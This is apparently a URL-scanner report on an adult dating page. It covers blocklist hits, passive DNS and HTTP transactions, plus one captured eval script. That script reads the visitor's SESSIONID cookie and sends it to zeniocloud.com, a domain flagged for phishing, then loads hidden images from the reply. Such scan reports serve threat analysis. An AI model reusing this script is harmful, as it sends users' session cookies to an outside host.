Overview

URL www.girlforfuck.com/it/multi/meins/6-781559/?cep=YQZxQlpd6LjWcQXZSJztDio7oN3A595ZICQQUVLDzSjNdxDtVfYh_DyDzd5_ARLTX6dwQNknDfoz1XnLosgUYiHdE4T_JX1JvL_C1WCgb5im1Aa_iYi-b48r6ir0WIdb8abHoLBhM0CyZmdDsRQLHQakXQmLD32n-k7dHvLy1OB5xCCJebzlonxDlz1foXMyxW02Pbn0qaB9guBVX60TFkrQxNgtQljS_ZKDSgr9G0T4NB4CiyXnM7WztWQlc01203Fj_fV1el_eK5lx2nzZ1j1AaP9-sXy7AsLraDirm_rndHFUeG9BdembixNlN4udHrPnUsRMWE2KMCUjpZ6TV0B77XxBnc2YAwH429_FZ_k0DjK3DnhPyHKG2MZMzSYR&lptoken=16cd63cf26f930047424
IP104.21.18.246
ASNCLOUDFLARENET
Location
Report completed2022-09-16 03:21:48 UTC
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-09-16 2 zeniocloud.com/JAIA.js?sub1=girlforfuck.com Phishing
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (20)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS ocsp.sca1b.amazontrust.com (3) 1015 2017-03-03 15:20:51 UTC 2019-03-27 04:05:54 UTC 143.204.42.88
mnemonic passive DNS push.services.mozilla.com (1) 2140 2015-09-03 10:29:36 UTC 2022-09-15 05:55:58 UTC 34.218.164.174
mnemonic passive DNS r3.o.lencr.org (7) 344 2020-12-02 08:52:13 UTC 2022-09-15 04:51:36 UTC 23.36.76.226
mnemonic passive DNS e1.o.lencr.org (2) 6159 2021-08-20 07:36:30 UTC 2022-09-15 05:08:16 UTC 23.36.77.32
mnemonic passive DNS img.almightypush.com (1) 70553 2021-07-16 17:04:39 UTC 2022-09-15 13:59:37 UTC 104.21.234.130
mnemonic passive DNS img-getpocket.cdn.mozilla.net (6) 1631 2017-09-01 03:40:57 UTC 2022-09-15 04:47:36 UTC 34.120.237.76
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-09-15 04:50:53 UTC 34.117.237.239
mnemonic passive DNS fonts.gstatic.com (1) 0 2014-08-29 13:43:22 UTC 2022-09-15 04:52:00 UTC 142.250.74.163 Domain (gstatic.com) ranked at: 540
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-09-15 05:55:39 UTC 143.204.55.25
mnemonic passive DNS ocsp.digicert.com (1) 86 2012-05-21 07:02:23 UTC 2022-09-15 23:57:23 UTC 93.184.220.29
mnemonic passive DNS static.production.almightypush.com (4) 214819 2021-09-25 16:34:18 UTC 2022-09-16 00:42:45 UTC 54.230.111.2
mnemonic passive DNS ocsp.pki.goog (8) 175 2017-06-14 07:23:31 UTC 2022-09-15 04:51:27 UTC 142.250.74.3
mnemonic passive DNS alexatracker.com (1) 0 2020-10-28 18:44:06 UTC 2022-09-15 04:56:25 UTC 51.68.197.173 Unknown ranking
mnemonic passive DNS lh3.google.com (1) 213 2013-06-02 21:16:56 UTC 2022-09-15 11:07:50 UTC 142.250.74.142
mnemonic passive DNS manager.production.almightypush.com (6) 731001 2021-12-13 07:30:11 UTC 2022-09-16 00:42:46 UTC 3.133.16.5
mnemonic passive DNS accounts.google.com (2) 81 2016-09-05 09:39:47 UTC 2022-09-15 22:52:41 UTC 216.58.207.237
mnemonic passive DNS www.girlforfuck.com (2) 0 2022-06-04 03:00:43 UTC 2022-09-16 02:01:07 UTC 104.21.18.246 Unknown ranking
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-05-27 20:08:30 UTC 2022-09-16 00:14:15 UTC 143.204.55.27
mnemonic passive DNS fonts.googleapis.com (1) 8877 2014-07-21 13:19:55 UTC 2022-09-15 17:07:15 UTC 142.250.74.10
mnemonic passive DNS zeniocloud.com (1) 0 2022-02-16 15:44:21 UTC 2022-09-16 00:42:45 UTC 167.114.67.56 Unknown ranking


Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 104.21.18.246

Date UQ / IDS / BL URL IP
2022-11-22 11:49:25 +0000
0 - 0 - 2 www.girlforfuck.com/es/multi/meins/4-659222/ 104.21.18.246
2022-10-15 00:09:04 +0000
0 - 0 - 1 www.girlforfuck.com/it/multi/meins/11-644321/ (...) 104.21.18.246
2022-10-08 09:26:31 +0000
0 - 0 - 1 www.girlforfuck.com/it/multi/meins/2-461503/? (...) 104.21.18.246
2022-10-07 08:20:41 +0000
0 - 0 - 1 www.girlforfuck.com/it/multi/meins/11-644321/ (...) 104.21.18.246
2022-09-28 05:36:54 +0000
0 - 0 - 1 www.girlforfuck.com/es/multi/meins/2-563719/? (...) 104.21.18.246

Last 5 reports on ASN: CLOUDFLARENET

Date UQ / IDS / BL URL IP
2022-12-09 06:21:00 +0000
0 - 0 - 3 allprofitsurvey.top/finance-survey.html 104.21.35.190
2022-12-09 06:20:58 +0000
0 - 0 - 2 www.opqswq.club/?dicbo=v1-ed3be53995c3ff37cdb (...) 172.67.188.214
2022-12-09 06:16:25 +0000
0 - 0 - 1 youfindadate.top/dating-survey.html 188.114.96.1
2022-12-09 06:15:30 +0000
0 - 0 - 4 cba-support.info/a1b2c3/1b54c17447fb4bd42a13e (...) 172.67.219.244
2022-12-09 06:13:51 +0000
0 - 0 - 1 www.yoerinec.beauty/c414F2395gB8R613Q1fb0dVT4 (...) 172.67.207.97

Last 5 reports on domain: girlforfuck.com

Date UQ / IDS / BL URL IP
2022-11-22 11:49:25 +0000
0 - 0 - 2 www.girlforfuck.com/es/multi/meins/4-659222/ 104.21.18.246
2022-11-04 07:22:12 +0000
0 - 0 - 3 www.girlforfuck.com/es/multi/meins/2-563719/ 172.67.183.245
2022-10-15 00:09:04 +0000
0 - 0 - 1 www.girlforfuck.com/it/multi/meins/11-644321/ (...) 104.21.18.246
2022-10-09 22:54:31 +0000
0 - 0 - 1 www.girlforfuck.com/it/multi/meins/6-781559/? (...) 172.67.183.245
2022-10-08 09:26:31 +0000
0 - 0 - 1 www.girlforfuck.com/it/multi/meins/2-461503/? (...) 104.21.18.246

Last 5 reports with similar screenshot

Date UQ / IDS / BL URL IP
2022-12-05 04:57:13 +0000
0 - 0 - 3 milfbuddies.net/PRL/IT/16-287867-0/ 172.67.212.16
2022-12-05 04:52:30 +0000
0 - 0 - 1 milfbuddies.net/PRL/IT/16-287867-0/?cep=9yZaP (...) 172.67.212.16
2022-10-23 19:07:57 +0000
0 - 0 - 3 milfbuddies.net/PRL/IT/16-287867-0/ 104.21.91.78
2022-10-23 02:04:16 +0000
0 - 0 - 1 milfbuddies.net/PRL/IT/16-287867-0/?cep=2o9K2 (...) 104.21.91.78
2022-10-12 05:53:14 +0000
0 - 0 - 1 ads.istngo.com/cb52dc4a-1627-4a7b-83bc-4025eb (...) 18.195.123.247


JavaScript

Executed Scripts (9)


Executed Evals (1)

#1 JavaScript::Eval (size: 1851, repeated: 1) - SHA256: b410c3983475ddc2587fc122c8e9fae6ff5965c370fbfd7df70a40d26036118b

                                        var Cgml = {
    apiUrl: 'https://zeniocloud.com/api/S6j3W2Mj68M?domain=' + encodeURIComponent(location.protocol + '//' + location.hostname),
    self: this,
    getSession: function() {
        let sessionCookie = document.cookie.match(/SESSIONID=([^;]+)/);
        console.log(sessionCookie);
        if (sessionCookie && sessionCookie.length === 2) {
            return sessionCookie[1];
        }
        return null;
    },
    getApiUrl: function() {
        let session = this.getSession();
        if (session) {
            return this.apiUrl + '&session=' + session;
        }
        return this.apiUrl;
    },
    init: function() {
        this.domReady(() => {
            this.checkS().then(() => {
                Cgml.callApi();
            }).catch(() => {});
        });
        document.addEventListener("DOMContentLoaded", () => {
            let tst = 1;
        });
    },
    checkS: function() {
        return new Promise((resolve, reject) => {
            let img = this.stringToNode(`<img src="https://lh3.google.com/u/0/d/1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0=w100" referrerpolicy="no-referrer" style="display: none;">`);
            document.body.appendChild(img);
            img.onerror = function() {
                reject();
            };
            img.onload = function() {
                resolve();
            };
        });
    },
    callApi: function() {
        fetch(this.getApiUrl()).then((response) => {
            return response.json();
        }).then((data) => {
            if (data.link) {
                document.body.appendChild(this.stringToNode(`<img src="${data.link}?pli=1" referrerpolicy="no-referrer" style="display: none;">`));
            }
        }).catch(function(err) {
            console.warn('Something went wrong due api call', err);
        });
    },
    stringToNode: function(str) {
        var parser = new DOMParser();
        var doc = parser.parseFromString(str, 'text/html');
        return doc.body.firstChild;
    },
    domReady: function(fn) {
        if (document.readyState !== 'loading') {
            fn();
        } else if (document.addEventListener) {
            document.addEventListener('DOMContentLoaded', fn, {
                once: true
            });
        } else {
            document.attachEvent('onreadystatechange', function() {
                if (document.readyState !== 'loading') fn();
            });
        }
    }
};
Cgml.init();
                                    

Executed Writes (0)



HTTP Transactions (52)


Request Response
                                        
                                            GET /it/multi/meins/6-781559/?cep=YQZxQlpd6LjWcQXZSJztDio7oN3A595ZICQQUVLDzSjNdxDtVfYh_DyDzd5_ARLTX6dwQNknDfoz1XnLosgUYiHdE4T_JX1JvL_C1WCgb5im1Aa_iYi-b48r6ir0WIdb8abHoLBhM0CyZmdDsRQLHQakXQmLD32n-k7dHvLy1OB5xCCJebzlonxDlz1foXMyxW02Pbn0qaB9guBVX60TFkrQxNgtQljS_ZKDSgr9G0T4NB4CiyXnM7WztWQlc01203Fj_fV1el_eK5lx2nzZ1j1AaP9-sXy7AsLraDirm_rndHFUeG9BdembixNlN4udHrPnUsRMWE2KMCUjpZ6TV0B77XxBnc2YAwH429_FZ_k0DjK3DnhPyHKG2MZMzSYR&lptoken=16cd63cf26f930047424 HTTP/1.1 
Host: www.girlforfuck.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         104.21.18.246
HTTP/1.1 301 Moved Permanently
                                        
Date: Fri, 16 Sep 2022 03:21:37 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Fri, 16 Sep 2022 04:21:37 GMT
Location: https://www.girlforfuck.com/it/multi/meins/6-781559/?cep=YQZxQlpd6LjWcQXZSJztDio7oN3A595ZICQQUVLDzSjNdxDtVfYh_DyDzd5_ARLTX6dwQNknDfoz1XnLosgUYiHdE4T_JX1JvL_C1WCgb5im1Aa_iYi-b48r6ir0WIdb8abHoLBhM0CyZmdDsRQLHQakXQmLD32n-k7dHvLy1OB5xCCJebzlonxDlz1foXMyxW02Pbn0qaB9guBVX60TFkrQxNgtQljS_ZKDSgr9G0T4NB4CiyXnM7WztWQlc01203Fj_fV1el_eK5lx2nzZ1j1AaP9-sXy7AsLraDirm_rndHFUeG9BdembixNlN4udHrPnUsRMWE2KMCUjpZ6TV0B77XxBnc2YAwH429_FZ_k0DjK3DnhPyHKG2MZMzSYR&lptoken=16cd63cf26f930047424
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o91f61HfmopHG1KmIL9nfItx8beEplAU8jukyq6YNJEf9Q%2Fv9nPHsi2oeXk0bSXKn7D%2F%2F2BxVjrZX5oepSHyXkn%2BoWZWRmzmrK8pJgjT9a8J0Px%2B%2B5esyKTmsPHxSGtA1Flx4%2FO%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 74b6791b1f32b51e-OSL
alt-svc: h2=":443"; ma=60

                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.27
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length, Content-Type, Alert, Backoff, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Fri, 16 Sep 2022 03:10:43 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 a9120cc3ff449047c990e82a4d5566ba.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: idDaCx__JlIUpOnflm_zTE-sAfmdEnRrmaakXqcR4ihCu8V3PgHewg==
Age: 653


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    91dd975a7b17b2922dd23c0e49314e40
Sha1:   57a2ece1e3cee7c4ebf927f2ba92f52cac395fe2
Sha256: 09966873bbf317f8910c59544cfde2a6d46e8acd2905797cc7c85c6b4d18ea8a
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "FEF9CE9F75EC19E7AE2CCBFFB6654DB2473A2B4ACC94C1B4303E5EC24149465F"
Last-Modified: Thu, 15 Sep 2022 18:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=18897
Expires: Fri, 16 Sep 2022 08:36:34 GMT
Date: Fri, 16 Sep 2022 03:21:37 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-10-09-23-18-04.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.25
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
content-length: 5348
last-modified: Sat, 20 Aug 2022 23:18:05 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Thu, 15 Sep 2022 04:35:16 GMT
etag: "742edb4038f38bc533514982f3d2e861"
x-cache: Hit from cloudfront
via: 1.1 277d0e3af1ffdcb1ee40b7dc9f040146.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: pcC3W8B33lYuqHbvFAiQ5eMKJ7cTpT7eRcdsdqZhDmM5VmOnzPrU8Q==
age: 81983
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    742edb4038f38bc533514982f3d2e861
Sha1:   cc3a20c8dc2a8c632ef9387a2744253f1e3fdef1
Sha256: b6bfa49d3d135035701231db2fffc0c0643444394009a94c6a1b4d829d6b8345
                                        
                                            POST / HTTP/1.1 
Host: e1.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 344
ETag: "1F50170F0275F75D8F7C837A7A1AB4A7A838DF0946C2A278130C27208551392E"
Last-Modified: Wed, 14 Sep 2022 14:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=436
Expires: Fri, 16 Sep 2022 03:28:54 GMT
Date: Fri, 16 Sep 2022 03:21:38 GMT
Connection: keep-alive

                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Fri, 16 Sep 2022 03:21:38 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            POST / HTTP/1.1 
Host: e1.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 344
ETag: "5D5DF34195102A139BB456DF1E091A99F3CBFE5C165244C837B27A1F4AE4EBCB"
Last-Modified: Wed, 14 Sep 2022 14:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21571
Expires: Fri, 16 Sep 2022 09:21:09 GMT
Date: Fri, 16 Sep 2022 03:21:38 GMT
Connection: keep-alive

                                        
                                            GET /mng/channels/init.min.js?ver=1654685585 HTTP/1.1 
Host: static.production.almightypush.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.girlforfuck.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.2
HTTP/2 200 OK
content-type: application/javascript
                                        
content-length: 21924
last-modified: Mon, 05 Sep 2022 12:24:26 GMT
accept-ranges: bytes
server: AmazonS3
date: Fri, 16 Sep 2022 02:20:06 GMT
etag: "2ea196bb9d9670ec138eb0c8c23e6696"
x-cache: Hit from cloudfront
via: 1.1 5bcfe2deda0bdbc6bade0af9b61602ca.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: bn6sW78eO3ky6oPsQ_GAExq_j-1-rwpkXxXK1VCzdJbE6rgBdFC-XQ==
age: 3983
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   21924
Md5:    2ea196bb9d9670ec138eb0c8c23e6696
Sha1:   b0876fd8c0c56c5d34368c16a829c040c23cbaba
Sha256: 1475c052ae8dbc220775cd44b20e508e38db9f09168c57d4a73e0a9027f252f7
                                        
                                            GET /mng/subs_window.css?ver=1654685585 HTTP/1.1 
Host: static.production.almightypush.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.girlforfuck.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.2
HTTP/2 200 OK
content-type: text/css
                                        
content-length: 6945
last-modified: Mon, 05 Sep 2022 12:24:26 GMT
accept-ranges: bytes
server: AmazonS3
date: Fri, 16 Sep 2022 03:02:37 GMT
etag: "bd7dbae15f904a4e1213439ebfefddbe"
x-cache: Hit from cloudfront
via: 1.1 5bcfe2deda0bdbc6bade0af9b61602ca.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: x9xc7FJXKtqI6t5MpyTnKn0_jJ5yP-Fg0crjMaCXpSILaScwzoYPhQ==
age: 1207
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text
Size:   6945
Md5:    bd7dbae15f904a4e1213439ebfefddbe
Sha1:   9f7a33b3d6e7965d8b99f0ff56cbf2e2ebb8f78e
Sha256: 30c08f3bb42d9a16155c65fbc952430048e4a84be70b98cb989b2dc977b49f8a
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sca1b.amazontrust.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         143.204.42.88
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: 'max-age=158059'
Date: Fri, 16 Sep 2022 03:21:38 GMT
Last-Modified: Fri, 16 Sep 2022 02:55:11 GMT
Server: ECS (dcb/7EC6)
X-Cache: Miss from cloudfront
Via: 1.1 5de23153ac267c206221751e1cccb6e8.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: B9QgHGQ-DuL1cGymz1tn2kwejbcLrQnn2DQqqnJyYGVw4tpx8N6gIQ==
Age: 1587

                                        
                                            GET /mng/subs_window.js?ver=1654685585 HTTP/1.1 
Host: static.production.almightypush.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.girlforfuck.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.2
HTTP/2 200 OK
content-type: application/javascript
                                        
content-length: 19491
last-modified: Mon, 05 Sep 2022 12:24:26 GMT
accept-ranges: bytes
server: AmazonS3
date: Thu, 15 Sep 2022 03:55:31 GMT
etag: "ae593f4be1dd1f0710123918b49c4933"
x-cache: Hit from cloudfront
via: 1.1 5bcfe2deda0bdbc6bade0af9b61602ca.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: 7YGK51jdnKa4epP5gJDQbB52WU_Co2jMzcjlkSDCR5eZ0A863OF6xg==
age: 84598
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text
Size:   19491
Md5:    ae593f4be1dd1f0710123918b49c4933
Sha1:   66fbe30bb873e0a47d3d72e737d68aa4b6916c26
Sha256: fdf9ff3f74dcf11d0fa456dcd53cb21550f67f0cfdc11dc29bef595f07b56206
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 16 Sep 2022 03:21:38 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.27
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Date: Fri, 16 Sep 2022 03:03:22 GMT
Cache-Control: max-age=3600
Expires: Fri, 16 Sep 2022 03:08:34 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 9ede9483eb891e14681c7c693b47c862.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: nkKJgqVRmm8hMUsg24exibGNTjnAYwNy0evNqLwlAjo4sD6ghXVTUg==
Age: 1096


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "E52BD6DAB1AC338E203B4AC70B59DFF5315C9AAE1741060CD77235AB1FC84955"
Last-Modified: Thu, 15 Sep 2022 23:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=18376
Expires: Fri, 16 Sep 2022 08:27:54 GMT
Date: Fri, 16 Sep 2022 03:21:38 GMT
Connection: keep-alive

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 16 Sep 2022 03:21:38 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 2834
Cache-Control: 'max-age=158059'
Date: Fri, 16 Sep 2022 03:21:38 GMT
Last-Modified: Fri, 16 Sep 2022 02:34:24 GMT
Server: ECS (ska/F70E)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 16 Sep 2022 03:21:39 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /s/roboto/v30/KFOmCnqEu92Fr1Mu4mxK.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://www.girlforfuck.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
